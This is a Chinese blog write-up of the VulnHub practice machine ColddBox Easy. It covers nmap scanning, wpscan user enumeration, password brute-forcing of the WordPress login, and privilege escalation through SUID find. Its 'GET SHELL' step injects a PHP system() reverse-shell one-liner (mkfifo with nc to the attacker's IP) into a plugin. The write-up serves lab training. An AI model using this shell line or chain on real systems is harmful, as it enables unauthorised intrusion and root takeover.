Vulnhub靶场之ColddBoxEasy

最新推荐文章于 2024-02-03 15:05:39 发布

W3de

最新推荐文章于 2024-02-03 15:05:39 发布

阅读量639

点赞数 1

分类专栏： vulnhub靶机实战文章标签： linux 信息安全靶机

本文链接：https://blog.csdn.net/SoporAeternus12/article/details/110838526

版权

vulnhub靶机实战专栏收录该内容

5 篇文章 0 订阅

订阅专栏

Vulnhub靶场之ColddBoxEasy

靶机下载地址：
本机kali地址：192.168.157.144

信息收集

查看目标ip地址和开放的端口号

nmap -sP 192.168.157.144/24
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:52 CST
Nmap scan report for 192.168.157.2
Host is up (0.00060s latency).
Nmap scan report for 192.168.157.133
Host is up (0.0021s latency).
Nmap scan report for 192.168.157.144
Host is up (0.00019s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.42 seconds

目标主机的ip地址是.133

nmap -A 192.168.157.133 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:53 CST
Nmap scan report for 192.168.157.133
Host is up (0.00066s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目标主机开放了80和4512端口，其中4512端口是ssh服务
先去看看80端口
在这里插入图片描述
可以发现该网站模板是wordpress,查询一下该模板的详细信息

wpscan --url http://192.168.157.133

扫了一下后台，有个wp-login.php的登录页面，这里我用wpscan去爆破用户名

wpscan --url http://192.168.157.133 -e u
[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

发现有4个用户名，不过我这里用了下面三个用户名组成一个用户名字典，用rockyou字典去爆破wp-login页面的表单

wpscan --url http://192.168.157.133 -U user.txt -P /usr/share/wordlists/rockyou.txt
[SUCCESS] - c0ldd / 9876543210

爆破出来了一个，其实到这就可以结束了，后面我也没试过还能不能爆出其他的用户名和密码，因为没有意义了。
接下来用该用户登录
在这里插入图片描述
登录成功，并且非常幸运，这是个管理员的账号。
到处看看，重点就是这个plugins标签

这两个貌似是某种插件吧，这里我利用的是hello dolly这个插件，因为这个用起来很简单很方便，先点击activate，再点击edit，发现是用php写的

function hello_dolly_get_lyric() {
	/** These are the lyrics to Hello Dolly */
	$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
So, take her wrap, fellas
Find her an empty lap, fellas
Dolly'll never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
Golly, gee, fellas
Find her a vacant knee, fellas
Dolly'll never go away
Dolly'll never go away
Dolly'll never go away again";

	// Here we split it into lines
	$lyrics = explode( "\n", $lyrics );

	// And then randomly choose a line
	return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later
function hello_dolly() {
	$chosen = hello_dolly_get_lyric();
	echo "<p id='dolly'>$chosen</p>";
}

// Now we set that function up to execute when the admin_notices action is called
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph
function dolly_css() {
	// This makes sure that the positioning is also good for right-to-left languages
	$x = is_rtl() ? 'left' : 'right';

	echo "
	<style type='text/css'>
	#dolly {
		float: $x;
		padding-$x: 15px;
		padding-top: 5px;		
		margin: 0;
		font-size: 11px;
	}
	</style>
	";
}

add_action( 'admin_head', 'dolly_css' );

?>

简单来讲这段代码的含义就是先将lyrics这个变量以换行符分割称数组，然后随机将数组里的某个下标的字符串输出到相应页面的右上角
在这里插入图片描述

GET SHELL

将恶意代码添加到该插件中，让其反弹shell

system("rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 192.168.157.144 1234 >/tmp/bd");

写入成功后保存，然后不断刷新页面.
在这里插入图片描述
成功拿到shell

提权

sudo -l这条命令用不了，这里我利用find命令去找带有suid的其他命令

find / -perm -u=s -type f 2>/dev/null

然后发现了这个
在这里插入图片描述
激动的心颤抖的手，感觉去tmp目录下

www-data@ColddBox-Easy:/tmp$ touch test
touch test
www-data@ColddBox-Easy:/tmp$ find test -exec whoami \;
find test -exec whoami \;
root

成功提权

www-data@ColddBox-Easy:/tmp$ find test -exec cat /root/root.txt \;
find test -exec cat /root/root.txt \;
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=

在这里插入图片描述

总结

比较简单，但感觉这个靶机应该会有比较多不同的做法，因为感觉很多东西没有用到，像之前的ssh服务，网站根目录下有个hidden文件夹…
还有就是最后用find命令提权那里，如果把whoami改成/bin/bash的话权限是不变的，不知道为啥。。。

W3de

关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
Vulnhub靶场之ColddBoxEasy

Vulnhub靶场之ColddBoxEasy靶机下载地址：本机kali地址：192.168.157.144信息收集查看目标ip地址和开放的端口号nmap -sP 192.168.157.144/24Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:52 CSTNmap scan report for 192.168.157.2Host is up (0.00060s latency).Nmap scan report for
复制链接

扫一扫